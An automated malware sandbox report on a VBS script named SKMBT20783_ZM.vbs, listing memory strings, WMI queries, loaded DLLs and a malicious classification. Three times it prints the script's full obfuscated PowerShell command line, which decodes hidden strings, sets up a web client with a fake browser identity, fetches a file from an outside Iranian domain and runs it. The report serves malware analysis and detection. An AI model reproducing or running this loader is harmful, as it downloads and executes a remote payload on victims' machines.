      Source: wscript.exe, 00000000.00000003.984407369.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983021913.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.984931075.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.w
      Source: wscript.exe, 00000000.00000003.884550858.0000021DA8213000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/
      Source: wscript.exe, 00000000.00000003.984407369.0000021DA628A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.984931075.0000021DA628A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983021913.0000021DA624E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: wscript.exe, 00000000.00000003.984407369.0000021DA628A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.984931075.0000021DA628A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983021913.0000021DA624E000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: wscript.exe, 00000000.00000003.884991399.0000021DA8171000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.885202022.0000021DA81E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.885081500.0000021DA81BC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?88f5d08ec4949
      Source: wscript.exe, 00000000.00000003.885202022.0000021DA8198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.890864007.0000021DA81AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.884991399.0000021DA8171000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?88f5d08ec4
      Source: qmgr.db.5.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.5.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.5.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.5.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.5.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.5.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.5.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000002.00000002.2196187747.00000270901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2171748938.0000027081D3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027081918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.00000270813F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027080E18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.00000270808E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.000002708222B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027081D8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027081A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027081727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027080572000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027080C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027082042000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aghayezayeat.ir
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aghayezayeat.ir/kids/Tyrosines.lzhP
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
      Source: edb.log.5.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 00000005.00000003.1203044606.0000025CEFA20000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2196187747.00000270901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
      Source: qmgr.db.5.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:

      System Summary

      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. 
I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: SKMBT20783_ZM.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5868
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5868Jump to behavior
      Source: classification engineClassification label: mal84.expl.evad.winVBS@6/9@21/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Hikes.OveJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wevutkbq.ifc.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. 
I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. 
I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Jump to behavior
      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
